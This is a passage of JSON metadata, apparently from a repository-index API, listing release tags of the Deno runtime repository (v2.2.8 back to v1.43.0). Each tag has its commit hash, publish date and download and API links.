,"sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T0